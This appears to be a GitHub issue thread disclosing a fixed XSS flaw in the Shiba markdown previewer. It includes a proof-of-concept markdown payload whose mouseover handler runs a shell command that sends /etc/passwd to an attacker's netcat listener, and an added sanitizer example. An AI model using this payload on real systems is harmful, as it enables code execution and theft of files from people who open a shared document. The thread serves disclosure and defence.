Closed silviavali closed 6 years ago
This was fixed in v1.1.1. So I'm closing. Thank you for your report.
Thanks for the info on the fix and the version.
Silvia
On 30 November 2017 at 05:07, Linda_pp notifications@github.com wrote:
Closed #42 https://github.com/rhysd/Shiba/issues/42.
@rhysd Can you confirm https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab is the fixing commit?
Hey,
Fix confirmed. Awesome job :) https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab
On 6 December 2017 at 06:18, Jericho notifications@github.com wrote:
@rhysd https://github.com/rhysd Can you confirm e8a65b0 https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab is the fixing commit?
@attritionorg Yes.
Date reported: 25th Nov, 2017
Vulnerable version: v1.1.0
Fixed on: Nov 28, 2017, version v1.1.1 (note: some of the HTML elements have been allowed since version v1.2.0)
Fixing commit: https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab
Shiba is a rich live markdown preview app with a linter. It provides functionality to open .md files, which means those files may be written by the user him/herself or may be markdown files shared with the user by some other third party.
Reproduce the vulnerability:
Attacker runs the following command in a terminal and waits for the connection 'home':
nc -l -p 1337 > passwd.txt
Attacker crafts the following file, payload.md, delivers it to the victim, and the victim opens it in Shiba:
<s <onmouseover="alert(1)"> <s onmouseover="const exec = require('child_process').exec; exec('nc -w 3 192.168.8.100 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr); });alert('1')">Hallo</s>
Possible scenario: Attacker crafts a markdown file ’payload.md’ and makes it publicly available for download, or tricks the victim into downloading it some other way and opening it with the Shiba application. Attacker starts netcat and listens on port 1337 to receive the /etc/passwd file content from the victim’s machine. Victim has downloaded and opened the file in the Shiba application. If the victim now hovers over the file content in the markdown editor, the payload gets executed in the background and the attacker receives the ‘/etc/passwd’ file content from the victim’s machine.
You can be sure that the payload got triggered when the alert '1' appears on the victim’s screen.
Output from developer tools:
By now the attacker has received the contents of the /etc/passwd file as the result:
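Editor's added example, not part of the report above and not Shiba's own code: an allowlist HTML sanitizer of the kind that neutralises this class of payload before rendered markdown reaches the preview pane. The point it demonstrates is that each tag is rebuilt from known-good attributes only, so every `on*` handler disappears no matter how the tag is mangled. The tag and attribute allowlist, the function names and the URL scheme list are the editor's choices; the sample input is constructed to match the shape of the report's payload with a harmless handler body.

```javascript
// Added example (not Shiba's code): allowlist sanitizer for HTML produced by a
// markdown renderer, applied before the HTML reaches the preview webview.
// The reported root cause is HTML passing through with event-handler attributes
// intact; rebuilding each tag from allowlisted attributes drops on* handlers
// regardless of how the tag is written. Allowlists below are the editor's choice.

const ALLOWED_TAGS = new Set(['p', 'br', 's', 'em', 'strong', 'code', 'pre', 'ul', 'ol',
  'li', 'blockquote', 'h1', 'h2', 'h3', 'a', 'img']);
const VOID_TAGS = new Set(['br', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt', 'title']) };
const URL_ATTRS = new Set(['href', 'src']);
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', tab: '\t', newline: '\n' };
const NO_ATTRS = new Set();

// Escape text for use as a text node or a double-quoted attribute value.
// Existing entity references are kept so already-encoded renderer output is not double-encoded.
function escapeText(s) {
  return s
    .replace(/&(?!(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z][a-zA-Z0-9]*);)/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Decode numeric and a few named entities so the scheme check cannot be bypassed
// with encodings such as &#106;avascript: or javascript&colon;.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-fA-F]+|#\d+|[a-zA-Z]+);/g, (whole, ent) => {
    if (ent[0] === '#') {
      const code = /^#x/i.test(ent) ? parseInt(ent.slice(2), 16) : parseInt(ent.slice(1), 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : whole;
    }
    const key = ent.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, key) ? NAMED_ENTITIES[key] : whole;
  });
}

// A URL is accepted if it is relative or its scheme is allowlisted.
// Control characters and whitespace are stripped first, as browsers ignore them in schemes.
function isSafeUrl(raw) {
  const url = decodeEntities(raw).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  return m === null || ALLOWED_SCHEMES.has(m[1]);
}

// Find the end of the tag starting at html[start] === '<', honouring quoted attribute
// values (the reported payload carries '=>' and '<' inside a quoted handler).
// Returns the index just past '>' or -1 if this '<' does not start a tag.
function readTag(html, start) {
  let j = start + 1;
  if (html[j] === '/') j++;
  if (!/[a-zA-Z]/.test(html[j] || '')) return -1;
  let quote = null;
  for (; j < html.length; j++) {
    const c = html[j];
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
    else if (c === '>') return j + 1;
  }
  return -1; // unterminated tag: the '<' is treated as text
}

// Rebuild one tag from its allowlisted parts only; unknown tags vanish, their text stays.
function rebuildTag(body) {
  const m = /^(\/?)([a-zA-Z][\w-]*)([\s\S]*)$/.exec(body);
  if (m === null) return '';
  const tag = m[2].toLowerCase();
  if (!ALLOWED_TAGS.has(tag)) return '';
  if (m[1] === '/') return VOID_TAGS.has(tag) ? '' : `</${tag}>`;
  const allowed = ALLOWED_ATTRS[tag] || NO_ATTRS;
  const attrRe = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let attrs = '';
  let a;
  while ((a = attrRe.exec(m[3])) !== null) {
    const name = a[1].toLowerCase();
    if (!allowed.has(name)) continue; // drops every on* handler, style, etc.
    const value = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : (a[4] || '');
    if (URL_ATTRS.has(name) && !isSafeUrl(value)) continue;
    attrs += ` ${name}="${escapeText(value)}"`;
  }
  return `<${tag}${attrs}>`;
}

function sanitizeHtml(html) {
  let out = '';
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) { out += escapeText(html.slice(i)); break; }
    out += escapeText(html.slice(i, lt));
    const end = readTag(html, lt);
    if (end === -1) { out += '&lt;'; i = lt + 1; continue; }
    out += rebuildTag(html.slice(lt + 1, end - 1));
    i = end;
  }
  return out;
}

// Constructed sample shaped like the report's payload, with a harmless handler body.
const SAMPLE = '<s <onmouseover="alert(1)"> <s onmouseover="require(\'child_process\').exec(\'id\', (e, out) => console.log(out))">Hallo</s>';

console.log(sanitizeHtml(SAMPLE)); // <s> <s>Hallo</s>
```

Both the malformed first `<s <onmouseover=...>` and the quoted handler containing `=>` survive naive pattern stripping, but neither attribute is on the allowlist, so both are gone from the output. Sanitising is only the first layer: the handler above can call `require('child_process')` solely because the renderer runs with Node integration, so in an Electron app the BrowserWindow should also be created with `webPreferences: { nodeIntegration: false, contextIsolation: true }`, which removes the code-execution step even if a sanitizer bug lets a handler through. For production use, a maintained library such as DOMPurify is preferable to a hand-rolled tokenizer like this one.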
Thank you for your report. I'll investigate this issue this weekend.
Ah, I'm sorry that I misunderstood your comment. https://github.com/rhysd/Shiba/issues/42#issuecomment-389316875 is a disclosure of this problem, which has already been fixed.
Hello,
I would like to report an XSS vulnerability in your application that leads to code execution. I have a working POC that I don't want to post publicly. Please contact me at silviavali14@gmail.com